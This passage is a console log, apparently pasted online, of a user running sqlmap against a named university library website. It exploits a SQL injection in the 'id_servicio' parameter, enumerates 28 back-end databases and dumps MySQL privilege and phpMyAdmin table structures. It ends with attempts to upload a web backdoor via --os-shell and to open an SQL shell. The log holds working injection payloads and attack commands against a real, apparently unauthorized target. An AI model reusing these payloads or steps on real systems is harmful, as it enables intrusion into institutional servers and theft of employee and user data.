  691. [17:24:33] [INFO] the SQL query used returns 28 entries
  692. available databases [28]:
  693. [*] adq
  694. [*] aleph
  695. [*] areas_biblioteca
  696. [*] biblioteca_digital
  697. [*] cosei
  698. [*] cuentasxxi
  699. [*] descarteah
  700. [*] empleados
  701. [*] inegi
  702. [*] information_schema
  703. [*] jornadas
  704. [*] libreria
  705. [*] libreria_antes_actualizacion
  706. [*] multimedia_registro
  707. [*] mysql
  708. [*] oai-uamx
  709. [*] phpmyadmin
  710. [*] pib
  711. [*] planes_bibliografia
  712. [*] proctec
  713. [*] recursos_electronicos
  714. [*] resguardos
  715. [*] revistas_electronicas
  716. [*] salas
  717. [*] sscbs
  718. [*] tesis
  719. [*] tesis_pruebas
  720. [*] test
  721.  
  722. [17:24:34] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  723.  
  724. [*] shutting down at 17:24:34
  725.  
  726.  
  727. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D empleados --tables
  728.          _
  729.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  730. |_ -| . | |     | .'| . |
  731. |___|_  |_|_|_|_|__,|  _|
  732.       |_|           |_|   http://sqlmap.org
  733.  
  734. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  735.  
  736. [*] starting at 17:25:17
  737.  
  738. [17:25:17] [INFO] testing connection to the target URL
  739. sqlmap resumed the following injection point(s) from stored session:
  740. ---
  741. Parameter: id_servicio (GET)
  742.     Type: boolean-based blind
  743.     Title: AND boolean-based blind - WHERE or HAVING clause
  744.     Payload: id_servicio=19 AND 1397=1397
  745.  
  746.     Type: AND/OR time-based blind
  747.     Title: MySQL >= 5.0.12 AND time-based blind
  748.     Payload: id_servicio=19 AND SLEEP(5)
  749.  
  750.     Type: UNION query
  751.     Title: Generic UNION query (NULL) - 11 columns
  752.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  753. ---
  754. [17:25:19] [INFO] testing MySQL
  755. [17:25:19] [INFO] confirming MySQL
  756. [17:25:20] [INFO] the back-end DBMS is MySQL
  757. web server operating system: Windows
  758. web application technology: PHP 5.2.3, Apache 2.2.4
  759. back-end DBMS: MySQL >= 5.0.0
  760. [17:25:20] [INFO] fetching tables for database: 'empleados'
  761. [17:25:21] [INFO] fetching number of tables for database 'empleados'
  762. [17:25:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  763. [17:25:21] [INFO] retrieved: 0
  764. [17:25:35] [WARNING] database 'empleados' appears to be empty
  765. [17:25:35] [ERROR] unable to retrieve the table names for any database
  766. do you want to use common table existence check? [y/N/q] y
  767. [17:25:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  768. [17:25:42] [INFO] checking table existence using items from 'C:\Users\whitejoker52\Desktop\hacking\sqlmap\txt\common-tables.txt'
  769. [17:25:42] [INFO] adding words used on web page to the check list
  770. please enter number of threads? [Enter for 1 (current)] 10
  771. [17:25:44] [INFO] starting 10 threads
  772. [17:27:09] [INFO] tried 367/3466 items (11%)
  773. [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  774. [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  775. [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  776. [17:27:12] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
  777. [17:28:41] [INFO] tried 718/3466 items (21%)
  778. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  779. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  780. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  781. [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  782. [17:32:13] [INFO] tried 1532/3466 items (44%)
  783. [17:32:13] [WARNING] turning off pre-connect mechanism because of connection time out(s)
  784. [17:32:13] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
  785. [17:32:14] [INFO] tried 1534/3466 items (44%)
  786. [17:32:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
  787. [17:33:17] [INFO] tried 1815/3466 items (52%)
  788. [17:33:19] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  789. [17:33:19] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  790. [17:34:52] [INFO] tried 2235/3466 items (64%)
  791. [17:34:55] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  792. [17:34:55] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  793. [17:36:22] [INFO] tried 2596/3466 items (75%)
  794. [17:36:27] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  795. [17:36:27] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  796. [17:37:49] [INFO] tried 2971/3466 items (86%)
  797. [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  798. [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  799. [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  800. [17:39:25] [INFO] tried 3343/3466 items (96%)
  801. [17:39:30] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  802. [17:39:30] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  803.  
  804. [17:40:05] [WARNING] no table(s) found
  805. No tables found
  806. [17:40:05] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  807.  
  808. [*] shutting down at 17:40:05
  809.  
  810.  
  811. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  812.          _
  813.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  814. |_ -| . | |     | .'| . |
  815. |___|_  |_|_|_|_|__,|  _|
  816.       |_|           |_|   http://sqlmap.org
  817.  
  818. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  819.  
  820. [*] starting at 17:40:13
  821.  
  822. [17:40:13] [INFO] testing connection to the target URL
  823. sqlmap resumed the following injection point(s) from stored session:
  824. ---
  825. Parameter: id_servicio (GET)
  826.     Type: boolean-based blind
  827.     Title: AND boolean-based blind - WHERE or HAVING clause
  828.     Payload: id_servicio=19 AND 1397=1397
  829.  
  830.     Type: AND/OR time-based blind
  831.     Title: MySQL >= 5.0.12 AND time-based blind
  832.     Payload: id_servicio=19 AND SLEEP(5)
  833.  
  834.     Type: UNION query
  835.     Title: Generic UNION query (NULL) - 11 columns
  836.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  837. ---
  838. [17:40:16] [INFO] testing MySQL
  839. [17:40:16] [INFO] confirming MySQL
  840. [17:40:16] [INFO] the back-end DBMS is MySQL
  841. web server operating system: Windows
  842. web application technology: PHP 5.2.3, Apache 2.2.4
  843. back-end DBMS: MySQL >= 5.0.0
  844. [17:40:16] [INFO] fetching database names
  845. [17:40:16] [INFO] the SQL query used returns 28 entries
  846. available databases [28]:
  847. [*] adq
  848. [*] aleph
  849. [*] areas_biblioteca
  850. [*] biblioteca_digital
  851. [*] cosei
  852. [*] cuentasxxi
  853. [*] descarteah
  854. [*] empleados
  855. [*] inegi
  856. [*] information_schema
  857. [*] jornadas
  858. [*] libreria
  859. [*] libreria_antes_actualizacion
  860. [*] multimedia_registro
  861. [*] mysql
  862. [*] oai-uamx
  863. [*] phpmyadmin
  864. [*] pib
  865. [*] planes_bibliografia
  866. [*] proctec
  867. [*] recursos_electronicos
  868. [*] resguardos
  869. [*] revistas_electronicas
  870. [*] salas
  871. [*] sscbs
  872. [*] tesis
  873. [*] tesis_pruebas
  874. [*] test
  875.  
  876. [17:40:16] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  877.  
  878. [*] shutting down at 17:40:16
  879.  
  880.  
  881. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D mysql --tables
  882.          _
  883.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  884. |_ -| . | |     | .'| . |
  885. |___|_  |_|_|_|_|__,|  _|
  886.       |_|           |_|   http://sqlmap.org
  887.  
  888. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  889.  
  890. [*] starting at 17:40:46
  891.  
  892. [17:40:46] [INFO] testing connection to the target URL
  893. sqlmap resumed the following injection point(s) from stored session:
  894. ---
  895. Parameter: id_servicio (GET)
  896.     Type: boolean-based blind
  897.     Title: AND boolean-based blind - WHERE or HAVING clause
  898.     Payload: id_servicio=19 AND 1397=1397
  899.  
  900.     Type: AND/OR time-based blind
  901.     Title: MySQL >= 5.0.12 AND time-based blind
  902.     Payload: id_servicio=19 AND SLEEP(5)
  903.  
  904.     Type: UNION query
  905.     Title: Generic UNION query (NULL) - 11 columns
  906.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  907. ---
  908. [17:40:49] [INFO] testing MySQL
  909. [17:40:49] [INFO] confirming MySQL
  910. [17:40:49] [INFO] the back-end DBMS is MySQL
  911. web server operating system: Windows
  912. web application technology: PHP 5.2.3, Apache 2.2.4
  913. back-end DBMS: MySQL >= 5.0.0
  914. [17:40:49] [INFO] fetching tables for database: 'mysql'
  915. [17:40:51] [INFO] the SQL query used returns 17 entries
  916. [17:40:53] [INFO] retrieved: columns_priv
  917. [17:40:55] [INFO] retrieved: db
  918. [17:40:56] [INFO] retrieved: func
  919. [17:40:59] [INFO] retrieved: help_category
  920. [17:41:01] [INFO] retrieved: help_keyword
  921. [17:41:03] [INFO] retrieved: help_relation
  922. [17:41:05] [INFO] retrieved: help_topic
  923. [17:41:08] [INFO] retrieved: host
  924. [17:41:10] [INFO] retrieved: proc
  925. [17:41:11] [INFO] retrieved: procs_priv
  926. [17:41:14] [INFO] retrieved: tables_priv
  927. [17:41:15] [INFO] retrieved: time_zone
  928. [17:41:17] [INFO] retrieved: time_zone_leap_second
  929. [17:41:20] [INFO] retrieved: time_zone_name
  930. [17:41:22] [INFO] retrieved: time_zone_transition
  931. [17:41:25] [INFO] retrieved: time_zone_transition_type
  932. [17:41:27] [INFO] retrieved: user
  933. Database: mysql
  934. [17 tables]
  935. +---------------------------+
  936. | user                      |
  937. | columns_priv              |
  938. | db                        |
  939. | func                      |
  940. | help_category             |
  941. | help_keyword              |
  942. | help_relation             |
  943. | help_topic                |
  944. | host                      |
  945. | proc                      |
  946. | procs_priv                |
  947. | tables_priv               |
  948. | time_zone                 |
  949. | time_zone_leap_second     |
  950. | time_zone_name            |
  951. | time_zone_transition      |
  952. | time_zone_transition_type |
  953. +---------------------------+
  954.  
  955. [17:41:27] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  956.  
  957. [*] shutting down at 17:41:27
  958.  
  959.  
  960. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D mysql -T db  --columns
  961.          _
  962.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  963. |_ -| . | |     | .'| . |
  964. |___|_  |_|_|_|_|__,|  _|
  965.       |_|           |_|   http://sqlmap.org
  966.  
  967. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  968.  
  969. [*] starting at 17:41:44
  970.  
  971. [17:41:44] [INFO] testing connection to the target URL
  972. sqlmap resumed the following injection point(s) from stored session:
  973. ---
  974. Parameter: id_servicio (GET)
  975.     Type: boolean-based blind
  976.     Title: AND boolean-based blind - WHERE or HAVING clause
  977.     Payload: id_servicio=19 AND 1397=1397
  978.  
  979.     Type: AND/OR time-based blind
  980.     Title: MySQL >= 5.0.12 AND time-based blind
  981.     Payload: id_servicio=19 AND SLEEP(5)
  982.  
  983.     Type: UNION query
  984.     Title: Generic UNION query (NULL) - 11 columns
  985.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  986. ---
  987. [17:41:47] [INFO] testing MySQL
  988. [17:41:47] [INFO] confirming MySQL
  989. [17:41:47] [INFO] the back-end DBMS is MySQL
  990. web server operating system: Windows
  991. web application technology: PHP 5.2.3, Apache 2.2.4
  992. back-end DBMS: MySQL >= 5.0.0
  993. [17:41:47] [INFO] fetching columns for table 'db' in database 'mysql'
  994. [17:41:48] [INFO] the SQL query used returns 20 entries
  995. [17:41:50] [INFO] retrieved: "Host","char(60)"
  996. [17:41:52] [INFO] retrieved: "Db","char(64)"
  997. [17:41:54] [INFO] retrieved: "User","char(16)"
  998. [17:41:55] [INFO] retrieved: "Select_priv","enum('N','Y')"
  999. [17:41:57] [INFO] retrieved: "Insert_priv","enum('N','Y')"
  1000. [17:41:59] [INFO] retrieved: "Update_priv","enum('N','Y')"
  1001. [17:42:01] [INFO] retrieved: "Delete_priv","enum('N','Y')"
  1002. [17:42:04] [INFO] retrieved: "Create_priv","enum('N','Y')"
  1003. [17:42:06] [INFO] retrieved: "Drop_priv","enum('N','Y')"
  1004. [17:42:07] [INFO] retrieved: "Grant_priv","enum('N','Y')"
  1005. [17:42:09] [INFO] retrieved: "References_priv","enum('N','Y')"
  1006. [17:42:12] [INFO] retrieved: "Index_priv","enum('N','Y')"
  1007. [17:42:14] [INFO] retrieved: "Alter_priv","enum('N','Y')"
  1008. [17:42:15] [INFO] retrieved: "Create_tmp_table_priv","enum('N','Y')"
  1009. [17:42:17] [INFO] retrieved: "Lock_tables_priv","enum('N','Y')"
  1010. [17:42:19] [INFO] retrieved: "Create_view_priv","enum('N','Y')"
  1011. [17:42:21] [INFO] retrieved: "Show_view_priv","enum('N','Y')"
  1012. [17:42:23] [INFO] retrieved: "Create_routine_priv","enum('N','Y')"
  1013. [17:42:25] [INFO] retrieved: "Alter_routine_priv","enum('N','Y')"
  1014. [17:42:26] [INFO] retrieved: "Execute_priv","enum('N','Y')"
  1015. Database: mysql
  1016. Table: db
  1017. [20 columns]
  1018. +-----------------------+---------------+
  1019. | Column                | Type          |
  1020. +-----------------------+---------------+
  1021. | User                  | char(16)      |
  1022. | Alter_priv            | enum('N','Y') |
  1023. | Alter_routine_priv    | enum('N','Y') |
  1024. | Create_priv           | enum('N','Y') |
  1025. | Create_routine_priv   | enum('N','Y') |
  1026. | Create_tmp_table_priv | enum('N','Y') |
  1027. | Create_view_priv      | enum('N','Y') |
  1028. | Db                    | char(64)      |
  1029. | Delete_priv           | enum('N','Y') |
  1030. | Drop_priv             | enum('N','Y') |
  1031. | Execute_priv          | enum('N','Y') |
  1032. | Grant_priv            | enum('N','Y') |
  1033. | Host                  | char(60)      |
  1034. | Index_priv            | enum('N','Y') |
  1035. | Insert_priv           | enum('N','Y') |
  1036. | Lock_tables_priv      | enum('N','Y') |
  1037. | References_priv       | enum('N','Y') |
  1038. | Select_priv           | enum('N','Y') |
  1039. | Show_view_priv        | enum('N','Y') |
  1040. | Update_priv           | enum('N','Y') |
  1041. +-----------------------+---------------+
  1042.  
  1043. [17:42:26] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1044.  
  1045. [*] shutting down at 17:42:26
  1046.  
  1047.  
  1048. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  1049.          _
  1050.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1051. |_ -| . | |     | .'| . |
  1052. |___|_  |_|_|_|_|__,|  _|
  1053.       |_|           |_|   http://sqlmap.org
  1054.  
  1055. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1056.  
  1057. [*] starting at 17:42:38
  1058.  
  1059. [17:42:38] [INFO] testing connection to the target URL
  1060. sqlmap resumed the following injection point(s) from stored session:
  1061. ---
  1062. Parameter: id_servicio (GET)
  1063.     Type: boolean-based blind
  1064.     Title: AND boolean-based blind - WHERE or HAVING clause
  1065.     Payload: id_servicio=19 AND 1397=1397
  1066.  
  1067.     Type: AND/OR time-based blind
  1068.     Title: MySQL >= 5.0.12 AND time-based blind
  1069.     Payload: id_servicio=19 AND SLEEP(5)
  1070.  
  1071.     Type: UNION query
  1072.     Title: Generic UNION query (NULL) - 11 columns
  1073.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1074. ---
  1075. [17:42:41] [INFO] testing MySQL
  1076. [17:42:41] [INFO] confirming MySQL
  1077. [17:42:41] [INFO] the back-end DBMS is MySQL
  1078. web server operating system: Windows
  1079. web application technology: PHP 5.2.3, Apache 2.2.4
  1080. back-end DBMS: MySQL >= 5.0.0
  1081. [17:42:41] [INFO] fetching database names
  1082. [17:42:41] [INFO] the SQL query used returns 28 entries
  1083. available databases [28]:
  1084. [*] adq
  1085. [*] aleph
  1086. [*] areas_biblioteca
  1087. [*] biblioteca_digital
  1088. [*] cosei
  1089. [*] cuentasxxi
  1090. [*] descarteah
  1091. [*] empleados
  1092. [*] inegi
  1093. [*] information_schema
  1094. [*] jornadas
  1095. [*] libreria
  1096. [*] libreria_antes_actualizacion
  1097. [*] multimedia_registro
  1098. [*] mysql
  1099. [*] oai-uamx
  1100. [*] phpmyadmin
  1101. [*] pib
  1102. [*] planes_bibliografia
  1103. [*] proctec
  1104. [*] recursos_electronicos
  1105. [*] resguardos
  1106. [*] revistas_electronicas
  1107. [*] salas
  1108. [*] sscbs
  1109. [*] tesis
  1110. [*] tesis_pruebas
  1111. [*] test
  1112.  
  1113. [17:42:41] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1114.  
  1115. [*] shutting down at 17:42:41
  1116.  
  1117.  
  1118. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D phpmyadmin --tables
  1119.          _
  1120.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1121. |_ -| . | |     | .'| . |
  1122. |___|_  |_|_|_|_|__,|  _|
  1123.       |_|           |_|   http://sqlmap.org
  1124.  
  1125. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1126.  
  1127. [*] starting at 17:43:09
  1128.  
  1129. [17:43:10] [INFO] testing connection to the target URL
  1130. sqlmap resumed the following injection point(s) from stored session:
  1131. ---
  1132. Parameter: id_servicio (GET)
  1133.     Type: boolean-based blind
  1134.     Title: AND boolean-based blind - WHERE or HAVING clause
  1135.     Payload: id_servicio=19 AND 1397=1397
  1136.  
  1137.     Type: AND/OR time-based blind
  1138.     Title: MySQL >= 5.0.12 AND time-based blind
  1139.     Payload: id_servicio=19 AND SLEEP(5)
  1140.  
  1141.     Type: UNION query
  1142.     Title: Generic UNION query (NULL) - 11 columns
  1143.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1144. ---
  1145. [17:43:12] [INFO] testing MySQL
  1146. [17:43:12] [INFO] confirming MySQL
  1147. [17:43:12] [INFO] the back-end DBMS is MySQL
  1148. web server operating system: Windows
  1149. web application technology: PHP 5.2.3, Apache 2.2.4
  1150. back-end DBMS: MySQL >= 5.0.0
  1151. [17:43:12] [INFO] fetching tables for database: 'phpmyadmin'
  1152. [17:43:14] [INFO] the SQL query used returns 7 entries
  1153. [17:43:16] [INFO] retrieved: pma_bookmark
  1154. [17:43:18] [INFO] retrieved: pma_column_info
  1155. [17:43:20] [INFO] retrieved: pma_history
  1156. [17:43:21] [INFO] retrieved: pma_pdf_pages
  1157. [17:43:23] [INFO] retrieved: pma_relation
  1158. [17:43:25] [INFO] retrieved: pma_table_coords
  1159. [17:43:26] [INFO] retrieved: pma_table_info
  1160. Database: phpmyadmin
  1161. [7 tables]
  1162. +------------------+
  1163. | pma_bookmark     |
  1164. | pma_column_info  |
  1165. | pma_history      |
  1166. | pma_pdf_pages    |
  1167. | pma_relation     |
  1168. | pma_table_coords |
  1169. | pma_table_info   |
  1170. +------------------+
  1171.  
  1172. [17:43:27] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1173.  
  1174. [*] shutting down at 17:43:27
  1175.  
  1176.  
  1177. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --os-shell
  1178.          _
  1179.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1180. |_ -| . | |     | .'| . |
  1181. |___|_  |_|_|_|_|__,|  _|
  1182.       |_|           |_|   http://sqlmap.org
  1183.  
  1184. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1185.  
  1186. [*] starting at 17:43:36
  1187.  
  1188. [17:43:36] [INFO] resuming back-end DBMS 'mysql'
  1189. [17:43:36] [INFO] testing connection to the target URL
  1190. sqlmap resumed the following injection point(s) from stored session:
  1191. ---
  1192. Parameter: id_servicio (GET)
  1193.     Type: boolean-based blind
  1194.     Title: AND boolean-based blind - WHERE or HAVING clause
  1195.     Payload: id_servicio=19 AND 1397=1397
  1196.  
  1197.     Type: AND/OR time-based blind
  1198.     Title: MySQL >= 5.0.12 AND time-based blind
  1199.     Payload: id_servicio=19 AND SLEEP(5)
  1200.  
  1201.     Type: UNION query
  1202.     Title: Generic UNION query (NULL) - 11 columns
  1203.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1204. ---
  1205. [17:43:39] [INFO] the back-end DBMS is MySQL
  1206. web server operating system: Windows
  1207. web application technology: PHP 5.2.3, Apache 2.2.4
  1208. back-end DBMS: MySQL 5
  1209. [17:43:39] [INFO] going to use a web backdoor for command prompt
  1210. [17:43:39] [INFO] fingerprinting the back-end DBMS operating system
  1211. [17:43:41] [INFO] the back-end DBMS operating system is Windows
  1212. which web application language does the web server support?
  1213. [1] ASP (default)
  1214. [2] ASPX
  1215. [3] JSP
  1216. [4] PHP
  1217. >
  1218. [17:43:57] [INFO] retrieved the web server document root: 'C:\AppServ\www'
  1219. [17:43:57] [INFO] retrieved web server absolute paths: 'C:/AppServ/www/cosei/servicio.html'
  1220. [17:43:57] [INFO] trying to upload the file stager on 'C:/AppServ/www/' via LIMIT 'LINES TERMINATED BY' method
  1221. sqlmap got a 302 redirect to 'http://biblioteca.xoc.uam.mx'. Do you want to follow? [Y/n] n
  1222. [17:44:10] [WARNING] unable to upload the file stager on 'C:/AppServ/www/'
  1223. [17:44:10] [INFO] trying to upload the file stager on 'C:/AppServ/www/' via UNION method
  1224. [17:44:10] [WARNING] the injection is on a GET parameter and the file to be written hexadecimal value is 8814 bytes, this might cause errors in the file writing process
  1225. [17:44:11] [WARNING] expect junk characters inside the file as a leftover from UNION query
  1226. [17:44:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
  1227. [17:44:15] [INFO] trying to upload the file stager on 'C:/AppServ/www/cosei/' via LIMIT 'LINES TERMINATED BY' method
  1228. [17:44:19] [WARNING] unable to upload the file stager on 'C:/AppServ/www/cosei/'
  1229. [17:44:19] [INFO] trying to upload the file stager on 'C:/AppServ/www/cosei/' via UNION method
  1230. [17:44:19] [WARNING] the injection is on a GET parameter and the file to be written hexadecimal value is 8842 bytes, this might cause errors in the file writing process
  1231. [17:44:23] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
  1232. [17:44:25] [WARNING] HTTP error codes detected during run:
  1233. 414 (Request-URI Too Long) - 4 times
  1234. [17:44:25] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1235.  
  1236. [*] shutting down at 17:44:25
  1237.  
  1238.  
  1239. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --sql-shell
  1240.          _
  1241.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1242. |_ -| . | |     | .'| . |
  1243. |___|_  |_|_|_|_|__,|  _|
  1244.       |_|           |_|   http://sqlmap.org
  1245.  
  1246. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1247.  
  1248. [*] starting at 17:44:35
  1249.  
  1250. [17:44:36] [INFO] resuming back-end DBMS 'mysql'
  1251. [17:44:36] [INFO] testing connection to the target URL
  1252. sqlmap resumed the following injection point(s) from stored session:
  1253. ---
  1254. Parameter: id_servicio (GET)
  1255.     Type: boolean-based blind
  1256.     Title: AND boolean-based blind - WHERE or HAVING clause
  1257.     Payload: id_servicio=19 AND 1397=1397
  1258.  
  1259.     Type: AND/OR time-based blind
  1260.     Title: MySQL >= 5.0.12 AND time-based blind
  1261.     Payload: id_servicio=19 AND SLEEP(5)
  1262.  
  1263.     Type: UNION query
  1264.     Title: Generic UNION query (NULL) - 11 columns
  1265.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1266. ---
  1267. [17:44:38] [INFO] the back-end DBMS is MySQL
  1268. web server operating system: Windows
  1269. web application technology: PHP 5.2.3, Apache 2.2.4
  1270. back-end DBMS: MySQL 5
  1271. [17:44:38] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
  1272. sql-shell> help
  1273. [17:44:44] [INFO] fetching SQL query output: 'help'
  1274. [17:44:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  1275. [17:44:46] [INFO] retrieved:
  1276. [17:44:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  1277. sql-shell>
  1278. sql-shell>